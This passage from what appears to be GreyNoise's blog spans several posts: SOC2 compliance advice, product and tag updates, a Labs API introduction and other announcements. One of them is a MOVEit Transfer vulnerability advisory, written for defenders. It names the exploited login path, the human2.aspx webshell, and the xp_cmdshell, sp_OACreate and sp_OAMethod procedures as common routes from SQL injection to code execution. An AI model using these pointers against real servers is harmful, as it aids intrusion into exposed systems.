Leverage an organization-wide password manager like 1Password or Bitwarden, with separate “vaults” for departments and roles. Use something with automatic detection of weak or reused passwords, and enforcement of strong password policies.

PRs, CI/CD, and Version Control

Implement some approval processes for your pull requests. Don’t limit it to just a manual review by engineering management or leadership. Include automated testing and the scanning of code for unit, integration, and end-to-end tests to ensure builds are passing and security policies/controls are green. Diagram out the overall process, like this: 

You will need different environments - such as development, staging, and production. Deployments move across each, and are tested in each before actual implementation in the production environment. Ideally, changes to these environments would be tracked and dictated by GitHub, GitLab, BitBucket, or some other code version control platform.

SIEM or Centralized Logging

A SIEM is not a requirement for SOC2, but extensive logging capabilities with alerting are. If there is a resource or storage essential to the operation of your product or business, access and audit logs for the resource should be easily retrieved and reviewed. 

If an employee logs in to a resource from Washington, DC and then logs in from Seattle, WA, a few moments later from a different device, you need to know about it immediately through logging or block that second login altogether. If 100GB of data is downloaded from an S3 bucket when the daily average is 10GB, alarm bells should go off. Establish what “normal” is, and have a process in place to regularly review anomalous activity or anything outside of that normal bound. 

Collecting logs will help you in post-incident response situations. Regularly reviewing and alerting on those logs will help you to avoid post-incident response situations.

Infrastructure and Provisioning

Have a reproducible process in place for spinning up infrastructure resources. This can be implemented with Infrastructure as Code and configuration management tools like Salt, Ansible, Terraform, Chef, Puppet, or CloudFormation. 

SOC2 will be significantly more painful if infrastructure in your environment is created manually by the engineering or IT team without an approval process or automation. GreyNoise infrastructure is entirely in Terraform and Salt. This way, approval and automation are shared with the CI/CD and pull request pipeline. If a process already exists that can be leveraged, it will save time. 

The general idea here is that you should do as much as possible NOT in the web console for something like AWS, Azure, or vCenter. Take note of any actions you perform in the web console - this is your automation list.

Mobile Device Management (MDM)

Install an MDM platform on all company-owned desktops, laptops, and phones. Any device which will access the internal systems of your product or customer data. Roll out the “compliance” packs for SOC2 to enforce things like password complexity, disk encryption, and software update cadence. 

This is a crowded space, often undergoing expansion and consolidation. Fleetsmith was a great Mac OS and iOS MDM tool. Apple acquired the company and quickly removed all capability to install third-party (non-Apple and non-App Store) apps. Apple killed the product two years after the acquisition. The gold-standard for Mac OS and iOS seems to be JAMF/JAMF Pro. 

GreyNoise ended up splitting MDM platforms - one for Mac and one for Windows/Linux. It is a difficult choice to make between a broader platform that covers three Linux distributions, Windows, and Mac OS at a percentage of what you need and two or three platforms that cover almost all of what you need for each.

Vendor Management

A lot of time will be spent on scoring vendor risk based on their operational reliance and the data they access or contain. Part of SOC2 requires collecting compliance reports from these vendors (SOC2, SOC3, ISO 270001, etc.) and reviewing them annually. A comprehensive list of vendors is an important one to keep up to date for both compliance and cost control reasons. 

In developing this list, GreyNoise found a handful of vendors we were still paying but either not using or the service/functionality they provided was duplicated by another platform. Ultimately, SOC2 required us to enumerate our vendors, generate a Software Bill of Materials (SBOM), and led to cost savings by eliminating or consolidating redundant platforms.  

Scanning

An understandably broad topic, but for SOC2 specifically you should be scanning for:

  • Vulnerabilities in dependencies/packages
  • Vulnerabilities in infrastructure in general - both internal and external
  • SOC2 compliance controls 

Each finding should have a rating from informational to critical, and each rating should have a time-to-resolution SLA which dictates how quickly or how much time it takes you to respond to and remediate. There are some free solutions which offer compliance control monitoring, such as SteamPipe compliance packs for AWS. GreyNoise decided to partner with SecureFrame to streamline the monitoring of these controls and to provide auditors with access to our provided documentation and evidence quickly and securely. A compliance automation vendor is strongly recommended for time and sanity's sake. 

CorpSec

SOC2 includes some business operational aspects which will encompass a few different departments or teams in your organization. The following are some examples required for SOC2:

  • Background checks for employees. 
  • Annual security and privacy training for employees. 
  • Documented processes for onboarding, offboarding, encryption, data retention, etc.
  • Regular board meetings, with meeting minutes and bylaws.
  • Quarterly access security reviews.
  • Job descriptions for all roles.

Many compliance automation platforms include auto-generated policies which require slight tweaking and adjustments to pass the “policy” controls. Invest time in either writing your own or significantly building on the automated policy output from your compliance platform. There are plenty of great security companies who publicly publish their policies (https://tailscale.com/security-policies/) which you can build on and adapt to your needs. GreyNoise will also publish our policies in the near future.

Phase 3 - Red to Green

Failing controls and tests will pop up after rolling out the compliance automation platform. The time to resolve these controls varies significantly, so consider this phase will take the longest time. In our experience, the longest controls to flip from red to green were all data encrypted in transit and all data encrypted at rest. 

You will want to resolve these tests until at least 90% are green before kicking off the audit itself. Work with your team to bucket the failing controls, and turn them into issues or projects to be assigned. You can even provide screenshot evidence of these projects and issues as proof of your organization’s incident tracking from discovery to resolution for the SOC2 audit.

This is the phase which will likely take the most time, money, and effort from your team. Unless you “shifted left” right out of the gate and began developing on day one with a security mindset baked in, plan to dedicate a few weeks or a couple of months to remediating failing controls.

Part of the phase also includes screenshot and evidence gathering. SecureFrame helped GreyNoise to easily organize this evidence and gave us an easy way for auditors to access it. This may take several days or weeks to complete and you will wind up with hundreds of screenshots, documents, templates, and examples. 

Phase 4 - Audit

One thing to note is that you will never see a failed SOC2 report or audit. You either get a report or not. If you fail to get a report, you can always try again when you are better positioned. Failure means you get to try again until you succeed. Success means you still need to do it again next year.

Timeline

From project kickoff to completion, SOC2 took GreyNoise about 18 months for the first time. Recertification, which needs to be completed annually, will take us about four months moving forward. 

The time to complete SOC2 accreditation can be greatly reduced by the more dedicated resources you have to the implementation and maintenance of compliance. The shortest amount of time we imagine possible for first-time SOC2 accreditation is six months. 

Keep in mind that you will be reperforming the audit exactly one year after you receive the accreditation. You may decide to add some other compliance certifications, such as ISO 270001. As time goes on and your company grows, compliance becomes harder and will require a dedicated team. 

Two Audits

The audit process is broken down into two phases, Type 1 and Type 2. Type 1 is a short audit period, usually a couple of days, and Type 2 is longer, usually between 60 and 90 days. 

Type 1 means you meet the audit criteria at a single point in time; Type 2 means you maintain compliance with those same criteria over a period of several months. In other words, Type 1 is meeting the compliance standard, and Type 2 is maintaining that compliance standard with any changes over time.

Conclusion

Here are some of our opinions, takeaways, and advice:

  • SOC2 will take you longer than you think
  • Hire System Administrators and IT operations early, as part of the first 20 employees
  • Use a compliance automation platform to save time and effort
  • Break out compliance with the framework into phases, with the audit happening last
  • Plan to build a compliance team to manage the process in the future
  • Treat documentation as a first-class citizen as early as possible
  • Use SOC2 to change process for the better, not just as a compliance checkbox

The way your organization approaches SOC2 compliance can be the easy way or the hard way. Attitude could be easy, to treat compliance like a checkbox and do the minimum to pass the audit. Or it could be hard - to take the input and output from the framework and make significant changes to processes to bake in security as a priority early on for everyone. For those serious about security, the hard choice is easy to make. 

GreyNoise Round Up: Product Updates - May 2023

May brought more product enhancements to user workflows, data coverage… and of course, more interesting tags! Twenty four to be exact, as we continue to improve our product to help our customers monitor emerging threats and identify benign actors. We improved our sensor coverage to include coverage in the country of Ghana, plus we made some helpful improvements to our bulk analysis, RIOT dataset, and APIs.  

Improvement to Bulk Analysis: Export Unknown IPs

The Bulk Analysis function in the GreyNoise Visualizer has been improved so that users can now export unidentified IPs via CSV and JSON.  

This improvement helps analysts more easily identify the ‘interesting’ IPs in a bulk dataset that they are analyzing (IPs identified by GreyNoise are identified to be known common scanners or common business services; IPs that are UNKNOWN in GreyNoise could represent a targeted threat or something that requires additional investigation). 

To access this feature, go to the GreyNoise Analysis page and analyze a file or dataset containing IP addresses.

Improvements to Destination Metadata: Sensor Hits

Two fields have been added to the metadata returned via Bulk Data, IP Context API, and GNQL API that will help users determine baselines or rates of activity:

  • metadata.sensor_hits is the amount of unique data the sensor has recorded from the queried IP.
  • metadata.sensor_count is the number of our sensors from which the IP address or behavior has been observed.

RIOT: Qualys Scanner IPs added

We are now tracking Qualys scanner IP addresses in our RIOT database of common business services, so that customers can whitelist this activity (should they wish to) or contextualize this activity when seen in their security logs.

RIOT identifies IPs from known benign services and organizations that commonly cause false positives in network security and threat intelligence products. The collection of IPs in RIOT is continually curated and verified to provide accurate results.

New and Updated Integrations

Splunk Improvements: High Volume Enrichment, IP Similarity and IP Timeline Support

The GreyNoise App for Splunk has been updated to include a new Feed component, which allows users to ingest the GreyNoise indicator feed into Splunk to be used for high-volume log enrichment. Additionally, new dashboard and commands have been added to support the IP Similarity and IP Timeline tools.  Learn More

ThreatQ Improvements: New Actions for ThreatQ Orchestrator

ThreatQ has released new GreyNoise Actions for the Orchestrator platform which allow for IP Similarity, RIOT and Quick lookups against the GreyNoise API. These updates can be downloaded from the ThreatQ Marketplace.  Learn More

Tags Coverage Enhancements

In May, GreyNoise added 24 new tags:

20 malicious activity tags

3 benign actor tags

1 unknown tag

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert informing them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023.

Sensor Coverage Enhancements: Ghana

We’ve added additional sensor coverage for the following countries:

You can view which IPs are seen scanning sensors in certain countries from our IP details page, or use `destination_country:”<country_name>”` in GNQL to find IPs that have hit those regions.  Destination country search is available in all commercial plans for GreyNoise and to our community VIP users.

Start for Free

Labs API: It’s Playtime

Introducing the Labs API Playground, a powerful tool designed to provide users quick access to data and an Early-Access/Beta API experience. Whether you’re a seasoned GreyNoise user (welcome back!) or just starting your journey (welcome aboard!), this playground will enable you to explore and interact with our data in new ways.

Accessing the Playground

To enter the Labs API Playground, visit https://api.labs.greynoise.io. It’s that easy! Who can access this playground? Anyone with a GreyNoise Account! And if you’re already a proud member of our GreyNoise community, you’re just a few clicks away from unlocking this API experience. Don't have a GreyNoise account yet? Create your free account here.

Rules of Engagement on Labs API

Before you dive straight into the Labs API, let’s familiarize ourselves with a few essential guidelines:

  1. Intended Use: The Labs API is a data source derived from the GreyNoise sensors and platform specifically designed to uncover insights our users may find intriguing and to facilitate exciting data explorations related to emerging threats; however, the Labs API is not for production use in user environments.
  2. Partial Data: The data sets available through the Labs API represent only a fraction (1%-10%) of the complete data. Users may be interested in accessing the entire set, but bulk data delivery is unavailable during the beta phase. If you have use cases that require access to the complete data set, we encourage you to contact us to schedule a discussion with our sales and product team.
  3. Support: If you encounter connectivity issues beyond verifying your GreyNoise account and accessing the Labs API Playground, please email labs@greynoise.io.
  4. Uptime and Downtime: We strive to maintain optimal uptime for the Labs API service; however, GreyNoise will only address downtime incidents during regular business hours.

Explore the Power of Labs API Queries

Now that you’re familiar with the playground’s rules and feedback process, it’s time to get hyped about the exciting world of Labs API queries! Here are a few notable ones to get you started:

topC2s

  • Access the top 1% of possible Command and Control (C2) IP addresses, ranked by their pervasiveness, observed by GreyNoise over the previous 24 hours. 
  • Use this query to identify second-stage IP addresses that might be involved in malicious activities following the reconnaissance and initial access stages. 
  • Please note that the data may be up to 4.5 hours old. 

topHTTPRequests

  • Access the top 1% of HTTP requests, ranked by their pervasiveness, observed by GreyNoise over the last seven days. Gain insights into the background radiation of the internet, exploring the patterns and trends of HTTP requests. 
  • Please note that the data may be up to 4.5 hours old. 

topPopularIPs

  • Access the top 1% of IPs searched in GreyNoise, ordered by the number of users observed searching over the last 7 days. Understand commonalities in how users search within GreyNoise, gaining insights into popular IPs and their associated activities. 
  • This query uses a minimum number of IP submissions and users to build consensus before an IP can be considered available in this dataset.
  • The data provided may be up to 4.5 hours old, and the “/” path has been removed as it is generally less valuable in most contexts. 

noiseRank

  • Access the top 1% of IPs by their noise score for the last 7 days. This score is determined by comparing the pervasiveness of the number of sensors and countries that observed packets from the IP, the request rate, and the diversity of payloads and ports for which the packets were observed. 
  • This query is intended to help rank the top noise makers compared to the quiet single-hit scanners.
  • Please note that the data may be up to 4.5 hours old. 

Share Your Discoveries

The Labs API Playground is intended to drive exploration and data-driven insights. Let curiosity guide you as you uncover hidden patterns, emerging threats, and connections within the vast landscape of internet noise.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

GreyNoise recommends reviewing systems for any indicators of unauthorized access that may have occurred within the past 90 days.

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023. MOVEIT transfer tag can be viewed here.


Progress’ security notice is advising users to review their system for unauthorized access for “at least the past 30 days”, however, GreyNoise has observed scanning activity for the login page of MOVEit Transfer located at /human.aspx as early as March 3rd, 2023. While we have not observed activity directly related to exploitation, all of the 5 IPs we have observed attempting to discover the location of MOVEit installations were marked as “Malicious” by GreyNoise for prior activities.

Based on the scanning activity we have observed, it is our recommendation that users of MOVEit Transfer should extend the time window for their review of potentially malicious activity to at least 90 days.

The primary artifact, observed through publicly available information, is the presence of a webshell named human2.aspx. This is a post-exploitation file artifact that is written to the filesystem by a malicious actor allowing them to execute arbitrary commands.

GreyNoise is observing scanning activity looking to identify the presence of the human2.aspx webshell dropped as part of the post-exploitation activity.

While the specific details of the initial exploitation vector are largely unknown at this time, we would like to provide the following items and details to our customers and community:

  • Several cybersecurity vendors are covering the subject including Rapid7 and TrustedSec
  • Rapid7 is indicating the initial vector may be a SQL injection vulnerability leading to remote code execution (SQLi-to-RCE)
  • Progress MOVEit Transfer is deployed with a Microsoft SQL (MSSQL) or My SQL (MYSQL) backing database
  • The login page of Progress MOVEit Transfer is located at /human.aspx
  • Common paths to achieve remote code execution through SQL injection include the usage of the following T-SQL commands:
  • xp_cmdshell
  • sp_OACreate
  • sp_OAMethod

Last but not least, a big thank you to the GreyNoise community for alerting us to this activity early on.

Enhancing Threat Detection and Response

The Situation

Threat hunters spend a significant portion of their time searching through security logs looking for specific Indicators of Compromise (IoCs) or patterns of activity/behavior that indicate compromise. This work comes with some specific challenges: 

  • Too Many Tools, Too Much (Nonsense) Data: Oftentimes, threat hunters end up with log files or results pages showing long lists of suspicious events (including related IP addresses), and it can take many hours to work through this information to filter and identify malicious activity. 
  • Time Spent Clustering: Identifying infrastructure used by adversaries is a time consuming process.
  • Building Early (but reliable) Detections: Detections developed to identify malicious activity can generate false positives or get outdated quickly if they are based on non-current data.

Techniques to Improve the situation

To further enhance threat hunting and address some of these pain points, organizations can use tools like GreyNoise in conjunction with a SIEM or SOAR platform to quickly identify potential threats and investigate them further and get more out of their existing tools and filter through data sources faster. By understanding how infrastructure is being used, vulnerabilities being leveraged, and patterns of scans, threat hunters can gain valuable context on how adversaries operate and improve their response to threats.

Recently, we held a webinar on this topic, where we discussed how organizations are using specific techniques in their day-to-day operations. To gain perspective on how you can streamline your threat hunting process, sign up for the webinar and download it today to learn: 

  • How to use GreyNoise features and SOAR playbooks to hunt, detect, and defend.
  • The ins and outs of analyzing logs to identify potential DDoS attacks and how to respond to them effectively.
  • Tips and tricks for incorporating vulnerability intelligence into your threat intel reports, which can help you stay ahead of emerging threats.
threat-hunting-webinar-cta

Announcing the GreyNoise Ambassador Program: Empowering Community Members to Make a Difference

GreyNoise is built on a strong foundation of mutual respect from our community. While we love doing swag drops on Twitter (or maybe Bluesky - anyone have an invite?), we wanted to recognize community members that go above and beyond. 

Enter the GreyNoise Ambassador Program! We couldn’t think of a better way to celebrate our users' constant support, spirit of collaboration, and mentorship within our community. I’m here to answer all your burning questions about the program and how you can apply!

Who Is the Ideal Ambassador?

Ambassadors are pillars of the GreyNoise Community. This program celebrates their efforts to support community growth and accessibility, focusing on three key elements:

  • Collaboration: This is not only sharing information, detection, or memes with the team at GreyNoise but with each other! We all win when we share.
  • Mentorship: People who are helpful and educate their peers.
  • Transparency: This is a core GreyNoise belief that you can and should be honest whenever possible.

Ambassadors are folks who have dedicated time and resources to bettering GreyNoise, whether through continuous feedback, bug reports, integrations, conference talks, or they’re just deeply dedicated to reducing Internet Noise. 

Why Join the Ambassador Program?

If you are on the fence about being an ambassador, let us tell you about the perks you get: 

  • Premium swag (see below) 
  • 5 VIP passes to give out to your friends, in line with our VIP guidelines 
  • Early access testing for any new GreyNoise features and products (including the forthcoming GreyNoise honeypot) 
Swag sneak peek!

What Is Expected of Me As An Ambassador?

In exchange for being our Ambassador, we ask that you will do 1 or more of the following:

  • Lead a “How I Use GreyNoise” session (these can be pre-recorded or live & public)
  • Participate in a product feedback session
  • Write a guest blog
  • Speak at a GreyNoise event (In person or virtual!) 
  • Continue to spread the word about GreyNoise :) 

Your term as an Ambassador will last a year, and when Spring 2024 rolls around, you will be asked to reapply.

How Do I Apply?

If this all sounds good to you, we ask that you fill out this application. We will evaluate applications until the end of May and send notice to our Ambassadors in early June!

If you have any questions, don’t hesitate to reach out to the Community team.

via Twitter

Internet Noise Search School with the GreyNoise Product Team - Searching for Words

As a Product Manager at GreyNoise, I’m constantly learning about how our users think about internet noise and accordingly search our data with the GreyNoise Query Language (GNQL). It might surprise you (or not) that we see some pretty random searches.

As evidenced by our 2000s style word cloud, users have been searching anything from “log4shell” to “lockbit” to “mcdonalds.” While GreyNoise search is not a threat actor Google, we do have a lot of data on interesting threats. Let me clear up our search bar for those of us who want to improve our ninja search skills.

What can you search for in GreyNoise?

The answer is anything, which is why you should use GNQL searches!

When you throw a word into the GreyNoise Viz search bar, we treat it like a free text search, where we search all of our data for that term - so this means if you search “banana,” we will return the IP addresses that have scanned for the “/banana/” directory. But we might also return IPs with “banana” in their user agent.

The GNQL way of guaranteeing you only get IPs with “banana” in the HTTP web paths is to utilize the raw_data.web.paths field selector. The search for our banana path would look like raw_data.web.paths:"/banana/"

(15 results!)

More fun with field selectors in GNQL is in our Cheat Sheet - Linked in the account help section or the search bar.

If you’re looking for an exceptional user agent or organization, we also have field selectors: raw_data.web.useragents and metadata.organization respectively.

For the searches that are word-based but land outside web paths, user agents, and organizations, we have a few other categories they might fall into - Actors, Tools, Botnets, and Techniques. For these, I recommend searching our tags. This is as easy as going to the tags page and utilizing the tag search bar, where we can return all our tags containing your search term.

As for threat groups - at this time, GreyNoise does not dabble in attribution to threat groups. If you’re looking for a particular group, we recommend identifying IoCs that the groups may use if you’re trying to track them down. We have found initial reconnaissance IPs in reports from other research groups lurking in our data and have those web paths that may indicate compromise by C2/botnet activity.

I hope these tips helped level up your GreyNoise search skills to help you find what you’re looking for even faster. Create deep dives into something haunting you using our Cheat Sheet, and stay tuned for more internet noise search tips soon!

Get Started With GreyNoise for Free

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Last week the Threat Analysis team at Trinity Cyber reached out to GreyNoise providing evidence of exploitation for CVE-2023-1389, a command injection vulnerability in TP-Link Archer AX21 firmware. With the provided information, in under two hours, GreyNoise deployed a tag to detect and confirm exploitation in the wild. You can read more about this here.

Shortly after shipping that tag, Trinity Cyber then provided evidence for five more CVEs which we were able to get tagged and published this week for all of our users! They are as follows:

  • CVE-2023-0640: a remote code execution vulnerability in TRENDnet TEW-652BRP
  • CVE-2023-27240: a remote code execution vulnerability in Tenda AX3
  • CVE-2019-20500: a remote code execution vulnerability in D-Link DWL-2600AP
  • CVE-2022-29303: a remote code execution vulnerability in Solarview Compact 6
  • CVE-2022-27002: a remote code execution vulnerability in Arris TR3300 

Thank you for your transparency and continued support, Trinity Cyber! Together we make the internet safer.

Want to partner with GreyNoise? Learn More >>

GreyNoise Round Up: Product Updates - April 2023

GreyNoise added a number of exciting updates in April, including 20 new tags for users to monitor emerging vulnerabilities and threats, and identify benign actors. We’ve also added integration updates to support our new IP Similarity and Timeline features, and enhancements to the IP Similarity capability to improve accuracy and give users a summary view to easily understand similar IP infrastructure.

IP Similarity Enhancements 

New IP Similarity Summary View

GreyNoise IP Similarity Summary View

We’ve enhanced our IP Similarity feature with a summary view that breaks down the high level summary of what fields we found similar in our dataset, and allows customers to quickly scan for common fields and tags.  IP Similarity is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

IP Similarity Model Updates

We've updated the algorithm used by our IP Similarity to improve accuracy through several changes. Feature vectors are scaled and normalized to increase the distance between low and high information numbers, resulting in lower similarity scores. Bugs related to tokenizing user agent and web path strings were fixed, and options like 'unknown' and certain domain names were excluded. Values for webpath, rDNS, OS, and ports were adjusted, resulting in a feature vector with 693 items. Lastly, the minimum info threshold was raised to help improve accuracy of results.

IP Timeline Enhancements 

GreyNoise IP Timeline Enhancements

90 Days of IP Timeline Data Now Available

We’ve enhanced our IP timeline feature to store up to 90 days of IP history data (previously, we provided up to 60 days of data) to enable customers to better understand historical IP activity when threat hunting or performing incident response.  IP Timeline is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

New and Updated Integrations

Integration Update: Anomali ThreatStream Enrichment

GreyNoise Similarity Intel

We updated our Anomali ThreatStream Enrichment to include our IP Similarity and IP Timeline features. From the context of an observable, customers can now see all details GreyNoise knows, plus view similar IPs and the timeline of observed activity. Learn More

New Integration: Anomali ThreatStream Malicious IP Feed

Our Malicious IP Feed is now available on the Anomali ThreatStream marketplace. Customers can now easily subscribe to the feed and get a daily update of malicious IPs that GreyNoise observed scanning the internet in the last 24 hours. Learn More

Integration Update: Splunk SOAR

We updated our Splunk SOAR integration to introduce two new commands: "similar noise ips" and "noise ip timeline". These commands pull data from the GreyNoise IP Similarity and IP Timeline features and allow customers to bring that context into Splunk SOAR for an analyst to use during an investigation.  Learn More

Integration Update: Maltego

We updated our Maltego Enterprise transform set to include a new Transform that allows for users to query for Similar IPs.  This leverages the new IP Similarity tool, and allows for Maltego users to bring similar IPs into their graph for additional research and correlation within Maltego.  Learn More

Integration Update: GreyNoise SDK

The GreyNoise SDK has been updated to include both CLI and API based commands to interact with the new IP Timeline and IP Similarity APIs. Learn More

Tags Coverage Enhancements

In the month of April, GreyNoise added 20 new tags:

10 malicious activity tags

6 benign actor tags

4 unknown activity tags

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert that will inform them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

In collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

Check Point Research discovered three vulnerabilities in Microsoft Message Queuing (MSMQ) service, patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. GreyNoise has a tag, classified as malicious, for the full QueueJumper RCE Attempt.

Sensor Coverage Enhancements

GreyNoise Sensor Coverage Enhancements

We’ve added additional sensor coverage for the following countries:

Destination country search is available in all commercial plans for GreyNoise and to our community VIP users. Start a trial* today to explore destination data.

Search Enhancements

GreyNoise Search Enhancements

The GNQL cheat sheet is now available in the search bar.  Want to learn more about how to effectively use GNQL? Review the cheat sheet for some helpful examples around syntax and available fields to use in search.

(*To begin your GreyNoise Enterprise Trial, sign-in to your account or sign-up for a free account, then go to your account details page and select "Start Trial".)
Get Started With GreyNoise for Free

No blog articles found

Please update your search term or select a different category and try again.